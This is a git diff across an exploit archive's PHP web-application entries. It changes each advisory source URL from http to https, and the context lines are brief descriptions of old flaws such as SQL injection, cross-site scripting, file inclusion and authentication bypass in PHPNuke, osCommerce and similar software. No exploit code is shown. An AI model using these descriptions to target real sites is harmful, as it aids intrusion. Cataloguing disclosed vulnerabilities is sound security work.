b/exploits/php/webapps/22347.txt index e0034e9b6..103381e52 100644 --- a/exploits/php/webapps/22347.txt +++ b/exploits/php/webapps/22347.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7078/info +source: https://www.securityfocus.com/bid/7078/info The AvantGo module for PHPNuke has been reported prone to a vulnerability which, when exploited, may disclose sensitive path information to a remote attacker. diff --git a/exploits/php/webapps/22348.txt b/exploits/php/webapps/22348.txt index 62f006443..4a2691f98 100644 --- a/exploits/php/webapps/22348.txt +++ b/exploits/php/webapps/22348.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7079/info +source: https://www.securityfocus.com/bid/7079/info The News module for PHPNuke has been reported prone to a vulnerability which, when exploited, may disclose sensitive path information to a remote attacker. diff --git a/exploits/php/webapps/22349.txt b/exploits/php/webapps/22349.txt index 2bef886a6..547dc073c 100644 --- a/exploits/php/webapps/22349.txt +++ b/exploits/php/webapps/22349.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7080/info +source: https://www.securityfocus.com/bid/7080/info The Splatt Forum module for PHPNuke has been reported prone to a vulnerability which, when exploited, may disclose sensitive path information to a remote attacker. diff --git a/exploits/php/webapps/22378.txt b/exploits/php/webapps/22378.txt index 6d3a8d1ad..7cde82cc5 100644 --- a/exploits/php/webapps/22378.txt +++ b/exploits/php/webapps/22378.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7126/info +source: https://www.securityfocus.com/bid/7126/info MyABraCaDaWeb is reported to disclose path information in error messages when handling some invalid requests. This information could be useful in further attacks against a system hosting the software. diff --git a/exploits/php/webapps/22382.txt b/exploits/php/webapps/22382.txt index dbde138d6..b313ded19 100644 --- a/exploits/php/webapps/22382.txt +++ b/exploits/php/webapps/22382.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7135/info +source: https://www.securityfocus.com/bid/7135/info Mambo Site Server has been reported prone to a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/22383.txt b/exploits/php/webapps/22383.txt index 624053dd2..79ae9c90f 100644 --- a/exploits/php/webapps/22383.txt +++ b/exploits/php/webapps/22383.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7139/info +source: https://www.securityfocus.com/bid/7139/info A cross-site scripting vulnerability has been reported for Basit. This vulnerability occurs due to insufficient sanitization of some user-supplied input. As a result of this deficiency an attacker may exploit the vulnerability by creating a specially crafted URL that includes malicious HTML code as URI parameters for Basit's Submit module. diff --git a/exploits/php/webapps/22385.txt b/exploits/php/webapps/22385.txt index 5d2fce364..edb2d7918 100644 --- a/exploits/php/webapps/22385.txt +++ b/exploits/php/webapps/22385.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7142/info +source: https://www.securityfocus.com/bid/7142/info A cross-site scripting vulnerability has been reported for Basit. This vulnerability occurs due to insufficient sanitization of some user-supplied input. As a result of this deficiency an attacker may exploit the vulnerability by creating a specially crafted URL that includes malicious HTML code as URI parameters for Basit's Search module. diff --git a/exploits/php/webapps/22386.txt b/exploits/php/webapps/22386.txt index f2e46c378..a0b260d29 100644 --- a/exploits/php/webapps/22386.txt +++ b/exploits/php/webapps/22386.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7143/info +source: https://www.securityfocus.com/bid/7143/info Siteframe has been reported vulnerable to an information disclosure vulnerability. diff --git a/exploits/php/webapps/22387.txt b/exploits/php/webapps/22387.txt index 201f02f88..7aed0a9f6 100644 --- a/exploits/php/webapps/22387.txt +++ b/exploits/php/webapps/22387.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7144/info +source: https://www.securityfocus.com/bid/7144/info It has been reported that DCP-Portal does not sufficiently filter URI parameters supplied to the DCP-Portal 'calender' script. diff --git a/exploits/php/webapps/22389.txt b/exploits/php/webapps/22389.txt index 7cd93a7d6..a56e545ba 100644 --- a/exploits/php/webapps/22389.txt +++ b/exploits/php/webapps/22389.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7149/info +source: https://www.securityfocus.com/bid/7149/info XOOPS has been reported vulnerable to an information disclosure vulnerability. According to the report, path information and other sensitive data may be output in server error messages. Information obtained in this manner may be used by an attacker to launch further attacks against a vulnerable system. This vulnerability was reported to affect XOOPS version 2.0. It is not currently known if other versions are affected. diff --git a/exploits/php/webapps/22391.txt b/exploits/php/webapps/22391.txt index ad6497a79..59fae8d95 100644 --- a/exploits/php/webapps/22391.txt +++ b/exploits/php/webapps/22391.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7151/info +source: https://www.securityfocus.com/bid/7151/info It has been reported that osCommerce does not sufficiently filter URI parameters supplied to multiple osCommerce scripts. diff --git a/exploits/php/webapps/22392.txt b/exploits/php/webapps/22392.txt index 7618451b7..40f31bc68 100644 --- a/exploits/php/webapps/22392.txt +++ b/exploits/php/webapps/22392.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7153/info +source: https://www.securityfocus.com/bid/7153/info It has been reported that osCommerce does not sufficiently filter URI parameters supplied to multiple osCommerce scripts. diff --git a/exploits/php/webapps/22393.txt b/exploits/php/webapps/22393.txt index 87925bd0c..efb713a68 100644 --- a/exploits/php/webapps/22393.txt +++ b/exploits/php/webapps/22393.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7155/info +source: https://www.securityfocus.com/bid/7155/info Error output is not sufficiently sanitized of HTML and script code by osCommerce. This may allow for cross-site scripting attacks as remote users could create a malicious link to a site hosting osCommerce which contains hostile HTML and script code. When a such a link is visited, attacker-supplied code could be interpreted in the web client of the user. diff --git a/exploits/php/webapps/22411.txt b/exploits/php/webapps/22411.txt index 6a5523cd1..59182cd7c 100644 --- a/exploits/php/webapps/22411.txt +++ b/exploits/php/webapps/22411.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7170/info +source: https://www.securityfocus.com/bid/7170/info It has been reported that an input validation error exists in the banners.php file included with PHPNuke. Because of this, an attacker could send a malicious string through PHPNuke that would allow the attacker to manipulate the database, and potentially access sensitive information, then download it via the web. diff --git a/exploits/php/webapps/22412.txt b/exploits/php/webapps/22412.txt index 7b4e6712d..a8cdb1fed 100644 --- a/exploits/php/webapps/22412.txt +++ b/exploits/php/webapps/22412.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7171/info +source: https://www.securityfocus.com/bid/7171/info It has been reported that an information disclosure vulnerability exists in Advanced Poll. Because of this, a remote user to potentially access privileged information that could lead to further attack against the host and it's users. diff --git a/exploits/php/webapps/22413.txt b/exploits/php/webapps/22413.txt index 2ed09cecf..ecf240064 100644 --- a/exploits/php/webapps/22413.txt +++ b/exploits/php/webapps/22413.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7172/info +source: https://www.securityfocus.com/bid/7172/info It has been reported that an input validation error exists in the article.php file included with PHPNuke as part of the News module. Because of this, an attacker could send a malicious string through PHPNuke that would allow the attacker to manipulate the database, and gain unauthorized access to user accounts. diff --git a/exploits/php/webapps/22414.php b/exploits/php/webapps/22414.php index 02afaff0e..09bb60a4c 100644 --- a/exploits/php/webapps/22414.php +++ b/exploits/php/webapps/22414.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7173/info +source: https://www.securityfocus.com/bid/7173/info It has been reported that an input validation error exists in the index.php file included with PHPNuke as part of the News module. Because of this, an attacker could send a malicious string through PHPNuke that would allow the attacker to manipulate the database and alter information on articles posted on the site. diff --git a/exploits/php/webapps/22421.txt b/exploits/php/webapps/22421.txt index 5011120ff..64382a002 100644 --- a/exploits/php/webapps/22421.txt +++ b/exploits/php/webapps/22421.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7190/info +source: https://www.securityfocus.com/bid/7190/info It has been reported that Web Chat Manager is prone to HTML injection attacks. This problem occurs due to insufficient sanitization of user-supplied input. diff --git a/exploits/php/webapps/22422.txt b/exploits/php/webapps/22422.txt index cee0c8661..4c3c1266e 100644 --- a/exploits/php/webapps/22422.txt +++ b/exploits/php/webapps/22422.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7191/info +source: https://www.securityfocus.com/bid/7191/info PHP-Nuke has been reported prone to a file disclosure vulnerability when using the viewpage.php addon. diff --git a/exploits/php/webapps/22423.txt b/exploits/php/webapps/22423.txt index 853e0a62a..f0ef593b0 100644 --- a/exploits/php/webapps/22423.txt +++ b/exploits/php/webapps/22423.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7193/info +source: https://www.securityfocus.com/bid/7193/info It has been reported that an input validation error exists in the 'viewtopic.php' script included with PHPNuke as part of the Forum module. Because of this, an attacker could send a malicious string through PHPNuke that would allow the attacker to inject SQL commands and queries into the SQL database used by PHPNuke. diff --git a/exploits/php/webapps/22424.txt b/exploits/php/webapps/22424.txt index bcfceefcd..038f2919b 100644 --- a/exploits/php/webapps/22424.txt +++ b/exploits/php/webapps/22424.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7194/info +source: https://www.securityfocus.com/bid/7194/info It has been reported that an input validation error exists in the 'viewforum.php' script included with PHPNuke as part of the Forum module. Because of this, an attacker could send a malicious string through PHPNuke that would allow the attacker to inject SQL commands and queries into the SQL database used by PHPNuke. diff --git a/exploits/php/webapps/22438.txt b/exploits/php/webapps/22438.txt index 7d334f67b..f9b73db1a 100644 --- a/exploits/php/webapps/22438.txt +++ b/exploits/php/webapps/22438.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7218/info +source: https://www.securityfocus.com/bid/7218/info Multiple path disclosure vulnerabilities have been reported in various PHP scripts used by PHP-Nuke. The issue occurs when an invalid URI parameter is passed to certain scripts. The affected scripts do not provide sufficient error handling for this circumstance and as such, may display an error page containing sensitive information path information. diff --git a/exploits/php/webapps/22439.txt b/exploits/php/webapps/22439.txt index 97d4f1b08..9a8ce5709 100644 --- a/exploits/php/webapps/22439.txt +++ b/exploits/php/webapps/22439.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7218/info +source: https://www.securityfocus.com/bid/7218/info Multiple path disclosure vulnerabilities have been reported in various PHP scripts used by PHP-Nuke. The issue occurs when an invalid URI parameter is passed to certain scripts. The affected scripts do not provide sufficient error handling for this circumstance and as such, may display an error page containing sensitive information path information. diff --git a/exploits/php/webapps/22443.txt b/exploits/php/webapps/22443.txt index 38d9351b4..9e57d65d9 100644 --- a/exploits/php/webapps/22443.txt +++ b/exploits/php/webapps/22443.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7232/info +source: https://www.securityfocus.com/bid/7232/info A vulnerability has been reported for Guestbook that may allow remote attackers to obtain unauthorized access to administrative functions. diff --git a/exploits/php/webapps/22444.txt b/exploits/php/webapps/22444.txt index 8392b6252..769cbd37b 100644 --- a/exploits/php/webapps/22444.txt +++ b/exploits/php/webapps/22444.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7234/info +source: https://www.securityfocus.com/bid/7234/info A path disclosure vulnerability has been reported for Guestbook. The issue occurs when a request is made to the cfooter.php3 PHP script page. diff --git a/exploits/php/webapps/22445.txt b/exploits/php/webapps/22445.txt index c4d50a75e..ff6d7a400 100644 --- a/exploits/php/webapps/22445.txt +++ b/exploits/php/webapps/22445.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7236/info +source: https://www.securityfocus.com/bid/7236/info A path disclosure vulnerability has been reported for ScozBook. The issue occurs when a request is made to the view.php script page. diff --git a/exploits/php/webapps/22451.txt b/exploits/php/webapps/22451.txt index de4565f2e..004f293e6 100644 --- a/exploits/php/webapps/22451.txt +++ b/exploits/php/webapps/22451.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7262/info +source: https://www.securityfocus.com/bid/7262/info It has been reported that it is possible to inject script code into the subject of a message in Phorum. This may be done by constructing a malicious subject line (or other fields) before sending an email to the target victim. diff --git a/exploits/php/webapps/22457.txt b/exploits/php/webapps/22457.txt index 6fad2d7db..2c702e8e5 100644 --- a/exploits/php/webapps/22457.txt +++ b/exploits/php/webapps/22457.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7275/info +source: https://www.securityfocus.com/bid/7275/info PHPSysInfo has been reported to be vulnerable to a file disclosure issue. diff --git a/exploits/php/webapps/22459.txt b/exploits/php/webapps/22459.txt index b80e319ab..7c97c7728 100644 --- a/exploits/php/webapps/22459.txt +++ b/exploits/php/webapps/22459.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7286/info +source: https://www.securityfocus.com/bid/7286/info PHPSysInfo has been reported to be vulnerable to a file disclosure issue. diff --git a/exploits/php/webapps/22461.txt b/exploits/php/webapps/22461.txt index 565c83e83..f3e2e65bf 100644 --- a/exploits/php/webapps/22461.txt +++ b/exploits/php/webapps/22461.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7290/info +source: https://www.securityfocus.com/bid/7290/info An input validation error has been reported in Invision Board which may result in the manipulation of SQL queries. This vulnerability exists in the functions.php script file. diff --git a/exploits/php/webapps/22473.txt b/exploits/php/webapps/22473.txt index aadf83f26..17dadcb5b 100644 --- a/exploits/php/webapps/22473.txt +++ b/exploits/php/webapps/22473.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7300/info +source: https://www.securityfocus.com/bid/7300/info Coppermine Photo Gallery has been reported prone to PHP code injection attacks. diff --git a/exploits/php/webapps/22474.txt b/exploits/php/webapps/22474.txt index 1d3373af6..5ccf6864b 100644 --- a/exploits/php/webapps/22474.txt +++ b/exploits/php/webapps/22474.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7301/info +source: https://www.securityfocus.com/bid/7301/info A vulnerability has been reported for Py-Membres 4.0 that allows remote attackers to modify the logic of SQL queries. diff --git a/exploits/php/webapps/22477.txt b/exploits/php/webapps/22477.txt index 8abdbfae6..5bf33a7c0 100644 --- a/exploits/php/webapps/22477.txt +++ b/exploits/php/webapps/22477.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7309/info +source: https://www.securityfocus.com/bid/7309/info phPay has been reported prone to multiple path disclosure vulnerabilities. diff --git a/exploits/php/webapps/22478.txt b/exploits/php/webapps/22478.txt index c717b8ff9..fbf8c46fa 100644 --- a/exploits/php/webapps/22478.txt +++ b/exploits/php/webapps/22478.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7310/info +source: https://www.securityfocus.com/bid/7310/info It has been reported that user-supplied input to phPay is not sufficiently sanitized. This lack of sanitization provides an opportunity for an attacker to launch cross-site scripting attacks. diff --git a/exploits/php/webapps/22491.txt b/exploits/php/webapps/22491.txt index d8ffaf33f..f1c01e78d 100644 --- a/exploits/php/webapps/22491.txt +++ b/exploits/php/webapps/22491.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7348/info +source: https://www.securityfocus.com/bid/7348/info Several cross site scripting vulnerabilities have been reported for eZ Publish. These vulnerabilities are due to insufficient sanitization of user-supplied data submitted to eZ Publish. diff --git a/exploits/php/webapps/22492.txt b/exploits/php/webapps/22492.txt index a3ffae58d..d17195782 100644 --- a/exploits/php/webapps/22492.txt +++ b/exploits/php/webapps/22492.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7349/info +source: https://www.securityfocus.com/bid/7349/info Several path disclosure vulnerabilities have been reported for eZ Publish. An attacker can exploit this vulnerability by making a HTTP request for any of the affected pages. This may result in a condition where path information is returned to the attacker. diff --git a/exploits/php/webapps/22498.txt b/exploits/php/webapps/22498.txt index 9b37f9021..41605c0d6 100644 --- a/exploits/php/webapps/22498.txt +++ b/exploits/php/webapps/22498.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7357/info +source: https://www.securityfocus.com/bid/7357/info osCommerce has been reported prone to authentication bypass vulnerability. diff --git a/exploits/php/webapps/22501.txt b/exploits/php/webapps/22501.txt index 3ca8ed8dd..afee8bfed 100644 --- a/exploits/php/webapps/22501.txt +++ b/exploits/php/webapps/22501.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7365/info +source: https://www.securityfocus.com/bid/7365/info A vulnerability has been reported for Xonic.ru News. The problem occurs due to insufficient sanitization of user-supplied data to the 'script.php' file. As a result, it may be possible for an attacker to pass malicious PHP or shell commands in requests to a target server. All commands would be executed on the system with the privileges of the vulnerable application. diff --git a/exploits/php/webapps/22517.txt b/exploits/php/webapps/22517.txt index 3c3b202ec..0e977a6c4 100644 --- a/exploits/php/webapps/22517.txt +++ b/exploits/php/webapps/22517.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7401/info +source: https://www.securityfocus.com/bid/7401/info It has been reported that OpenBB does not properly check input passed via the 'index.php' script. Because of this, an attacker may be able to inject arbitrary commands to the database in the context of the bulletin board software. The consequences will vary depending on the underlying database implementation. diff --git a/exploits/php/webapps/22519.txt b/exploits/php/webapps/22519.txt index 38205bd84..0615f1bcd 100644 --- a/exploits/php/webapps/22519.txt +++ b/exploits/php/webapps/22519.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7404/info +source: https://www.securityfocus.com/bid/7404/info It has been reported that OpenBB does not properly check input passed via the 'board.php' script. Because of this, an attacker may be able to inject arbitrary commands to the database in the context of the bulletin board software. The consequences will vary depending on the underlying database implementation. diff --git a/exploits/php/webapps/22520.txt b/exploits/php/webapps/22520.txt index 7460a01b5..cfa760cb2 100644 --- a/exploits/php/webapps/22520.txt +++ b/exploits/php/webapps/22520.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7405/info +source: https://www.securityfocus.com/bid/7405/info It has been reported that OpenBB does not properly check input passed via the 'member.php' script. Because of this, an attacker may be able to inject arbitrary commands to the database in the context of the bulletin board software. The consequences will vary depending on the underlying database implementation. diff --git a/exploits/php/webapps/22521.c b/exploits/php/webapps/22521.c index f9940b6ed..f44526e56 100644 --- a/exploits/php/webapps/22521.c +++ b/exploits/php/webapps/22521.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7406/info +// source: https://www.securityfocus.com/bid/7406/info XMB Forum Member.PHP has been reported prone to an SQL injection vulnerability, under certain conditions. diff --git a/exploits/php/webapps/22534.txt b/exploits/php/webapps/22534.txt index dc021495e..6ab224646 100644 --- a/exploits/php/webapps/22534.txt +++ b/exploits/php/webapps/22534.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7427/info +source: https://www.securityfocus.com/bid/7427/info A vulnerability has been reported for Truegalerie that may result in unauthorized administrative access. The vulnerability exists due to insufficient sanitization of some URI values. diff --git a/exploits/php/webapps/22539.txt b/exploits/php/webapps/22539.txt index bff7f87bc..b920ec569 100644 --- a/exploits/php/webapps/22539.txt +++ b/exploits/php/webapps/22539.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7434/info +source: https://www.securityfocus.com/bid/7434/info A HTML injection vulnerability has been discovered in Xoops. The problem occurs due to insufficient filtering of HTML and script code by the MyTextSanitizer script. diff --git a/exploits/php/webapps/22543.txt b/exploits/php/webapps/22543.txt index 3dd38e7cd..42780edba 100644 --- a/exploits/php/webapps/22543.txt +++ b/exploits/php/webapps/22543.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7441/info +source: https://www.securityfocus.com/bid/7441/info OneCenter ForumOne 4.0 is a full-featured, web-based group discussion forum. diff --git a/exploits/php/webapps/22557.txt b/exploits/php/webapps/22557.txt index 56a4b5a17..10a9f2801 100644 --- a/exploits/php/webapps/22557.txt +++ b/exploits/php/webapps/22557.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7483/info +source: https://www.securityfocus.com/bid/7483/info Splatt Forum is a public message board plugin designed to be used with PHPNuke. diff --git a/exploits/php/webapps/22558.txt b/exploits/php/webapps/22558.txt index ccdb7b000..de8d62886 100644 --- a/exploits/php/webapps/22558.txt +++ b/exploits/php/webapps/22558.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7484/info +source: https://www.securityfocus.com/bid/7484/info A problem with Splatt Forum could allow remote users to execute arbitrary code in the context of the web site running the Splatt Forum module. The problem occurs due to the lack of sanitization performed on character representations of HTML tags. diff --git a/exploits/php/webapps/22577.txt b/exploits/php/webapps/22577.txt index 3f2299af9..d05142b0b 100644 --- a/exploits/php/webapps/22577.txt +++ b/exploits/php/webapps/22577.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7542/info +source: https://www.securityfocus.com/bid/7542/info A remote file include vulnerability has been reported for both ttForum and ttCMS. Due to insufficient sanitization of some user-supplied variables by the 'News.php' and 'Install.php' scripts, it is possible for a remote attacker to include a malicious PHP file in a URL. diff --git a/exploits/php/webapps/22578.txt b/exploits/php/webapps/22578.txt index 1d7d10f24..adeaf2528 100644 --- a/exploits/php/webapps/22578.txt +++ b/exploits/php/webapps/22578.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7542/info +source: https://www.securityfocus.com/bid/7542/info A remote file include vulnerability has been reported for both ttForum and ttCMS. Due to insufficient sanitization of some user-supplied variables by the 'News.php' and 'Install.php' scripts, it is possible for a remote attacker to include a malicious PHP file in a URL. diff --git a/exploits/php/webapps/22579.txt b/exploits/php/webapps/22579.txt index 40e88040d..91f6bd911 100644 --- a/exploits/php/webapps/22579.txt +++ b/exploits/php/webapps/22579.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7545/info +source: https://www.securityfocus.com/bid/7545/info An HTML injection issue has been reported which may lead to unauthorized code execution. diff --git a/exploits/php/webapps/22589.txt b/exploits/php/webapps/22589.txt index 444e70869..30d4baf9f 100644 --- a/exploits/php/webapps/22589.txt +++ b/exploits/php/webapps/22589.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7558/info +source: https://www.securityfocus.com/bid/7558/info It has been reported that multiple input validation bugs exist in the Web_Links module used by PHPNuke. Because of this, a remote user may be able to access the database and potentially gain access to sensitive information. Successful exploitation could result in compromise of the web forums or more severe consequences. diff --git a/exploits/php/webapps/22595.txt b/exploits/php/webapps/22595.txt index 5f607b461..7bd224210 100644 --- a/exploits/php/webapps/22595.txt +++ b/exploits/php/webapps/22595.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7570/info +source: https://www.securityfocus.com/bid/7570/info A cross site scripting vulnerability has been reported for PHP-Nuke. Specifically, PHP-Nuke does not sufficiently sanitize user-supplied input for the 'username' URI parameter to the modules.php script. diff --git a/exploits/php/webapps/22597.txt b/exploits/php/webapps/22597.txt index 9ff969e4a..7b53549d2 100644 --- a/exploits/php/webapps/22597.txt +++ b/exploits/php/webapps/22597.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7588/info +source: https://www.securityfocus.com/bid/7588/info PHP-Nuke is reportedly prone to multiple SQL injection vulnerabilities in the Downloads module. Exploitation could allow for injection of malicious SQL syntax, resulting in modification of SQL query logic or other attacks. diff --git a/exploits/php/webapps/22598.txt b/exploits/php/webapps/22598.txt index 7899a133b..99f7ab23a 100644 --- a/exploits/php/webapps/22598.txt +++ b/exploits/php/webapps/22598.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7589/info +source: https://www.securityfocus.com/bid/7589/info The Web_Links module for PHP-Nuke has been reported prone to a vulnerability which, when exploited, may disclose sensitive path information to a remote attacker. diff --git a/exploits/php/webapps/22599.html b/exploits/php/webapps/22599.html index f3f4333e1..1c3750a18 100644 --- a/exploits/php/webapps/22599.html +++ b/exploits/php/webapps/22599.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7594/info +source: https://www.securityfocus.com/bid/7594/info A vulnerability has been reported in vBulletin 3.0.0 beta 2. The problem is said to occur due to insufficient sanitization of private messages. As a result, an attacker may be capable of embedding malicious HTML or script code within a private message. This code may be interpreted by a legitimate user when previewing the message. diff --git a/exploits/php/webapps/22600.txt b/exploits/php/webapps/22600.txt index ccd58edec..60ce4b696 100644 --- a/exploits/php/webapps/22600.txt +++ b/exploits/php/webapps/22600.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7595/info +source: https://www.securityfocus.com/bid/7595/info Owl has been reported prone to an authentication bypass vulnerability. diff --git a/exploits/php/webapps/22603.txt b/exploits/php/webapps/22603.txt index 558f20148..e8bcf41b1 100644 --- a/exploits/php/webapps/22603.txt +++ b/exploits/php/webapps/22603.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7598/info +source: https://www.securityfocus.com/bid/7598/info A vulnerability has been reported for PHP-Proxima. The problem occurs in the autohtml.php script. Specifically, the script fails to verify the contents of a user-supplied variable before including a specified file into an HTML file. As a result, a malicious remote user may be capable of using this as a channel to disclose the contents of arbitrary local system files. diff --git a/exploits/php/webapps/22605.txt b/exploits/php/webapps/22605.txt index 832f8ba46..44ee3c2d1 100644 --- a/exploits/php/webapps/22605.txt +++ b/exploits/php/webapps/22605.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7609/info +source: https://www.securityfocus.com/bid/7609/info An SQL injection issue has been reported to affect OneOrZero Helpdesk. The error presents itself in a OneOrZero Helpdesk script that fails to sufficiently sanitize user-supplied input before including it in SQL queries. diff --git a/exploits/php/webapps/22606.py b/exploits/php/webapps/22606.py index e19774eb0..5c99aa07a 100755 --- a/exploits/php/webapps/22606.py +++ b/exploits/php/webapps/22606.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7611/info +source: https://www.securityfocus.com/bid/7611/info OneOrZero Helpdesk has been reported prone to an issue that may result in an attacker obtaining unauthorized administrative access. diff --git a/exploits/php/webapps/22607.txt b/exploits/php/webapps/22607.txt index beeaf8fcf..4a73d1ad4 100644 --- a/exploits/php/webapps/22607.txt +++ b/exploits/php/webapps/22607.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7616/info +source: https://www.securityfocus.com/bid/7616/info A cross-site scripting vulnerability has been reported for eZ publish. Specifically, eZ publish does not sufficiently sanitize user-supplied input supplied to the 'index.php' script. diff --git a/exploits/php/webapps/22612.txt b/exploits/php/webapps/22612.txt index 4fc6884e9..6d78de5a6 100644 --- a/exploits/php/webapps/22612.txt +++ b/exploits/php/webapps/22612.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7625/info +source: https://www.securityfocus.com/bid/7625/info A remote file include vulnerability has been reported for ttCMS. Due to insufficient sanitization of some user-supplied variables by the 'header.php' script, it is possible for a remote attacker to include a malicious PHP file in a URL. diff --git a/exploits/php/webapps/22618.txt b/exploits/php/webapps/22618.txt index 423aebf91..5131b420f 100644 --- a/exploits/php/webapps/22618.txt +++ b/exploits/php/webapps/22618.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7634/info +source: https://www.securityfocus.com/bid/7634/info A problem with ttCMS/ttForum could make it possible for a remote user to launch SQL injection attacks. diff --git a/exploits/php/webapps/22625.txt b/exploits/php/webapps/22625.txt index 4fe67f61e..f9e17d905 100644 --- a/exploits/php/webapps/22625.txt +++ b/exploits/php/webapps/22625.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7651/info +source: https://www.securityfocus.com/bid/7651/info A vulnerability has been reported for SudBox Boutique. The problem occurs due to insufficient initialization of variables and may allow an unauthorized user to gain authenticate. Specifically, by making a malicious request to the login.php script it may be possible to authenticate as the administrative user. diff --git a/exploits/php/webapps/22632.txt b/exploits/php/webapps/22632.txt index 62004ea66..ef0348718 100644 --- a/exploits/php/webapps/22632.txt +++ b/exploits/php/webapps/22632.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7662/info +source: https://www.securityfocus.com/bid/7662/info XMB Forum has been reported prone to a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/22641.txt b/exploits/php/webapps/22641.txt index 726eaf5f1..0c4d3f74d 100644 --- a/exploits/php/webapps/22641.txt +++ b/exploits/php/webapps/22641.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7677/info +source: https://www.securityfocus.com/bid/7677/info It has been reported that BLNews is prone to a remote file include vulnerability. This is due to the incorrection initilization of some PHP headers within the application. As a result, an attacker may be capable of executing arbitrary PHP commands within the context of the web server. diff --git a/exploits/php/webapps/22642.txt b/exploits/php/webapps/22642.txt index 0784cf43b..4fd81ac32 100644 --- a/exploits/php/webapps/22642.txt +++ b/exploits/php/webapps/22642.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7678/info +source: https://www.securityfocus.com/bid/7678/info A vulnerability has been reported in Ultimate PHP Board. The problem is said to occur due to insufficient sanitization of user-supplied input before including log data into a PHP file. As a result, it may be possible for a remote attacker to execute arbitrary PHP commands within the context of the web server. The execution of these commands would only occur when an administrator chooses to view the log of forum activity via the 'admin_iplog.php' script. diff --git a/exploits/php/webapps/22651.txt b/exploits/php/webapps/22651.txt index 566fff21f..df7941187 100644 --- a/exploits/php/webapps/22651.txt +++ b/exploits/php/webapps/22651.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7697/info +source: https://www.securityfocus.com/bid/7697/info A vulnerability has been discovered in PostNuke Phoenix v0.723 and earlier. Specifically, the Glossary module fails to sufficiently sanitize user-supplied input, making it prone to SQL injection attacks. diff --git a/exploits/php/webapps/22663.txt b/exploits/php/webapps/22663.txt index 0e87f11e2..9cfc8a230 100644 --- a/exploits/php/webapps/22663.txt +++ b/exploits/php/webapps/22663.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7705/info +source: https://www.securityfocus.com/bid/7705/info A vulnerability has been reported that could enable a member 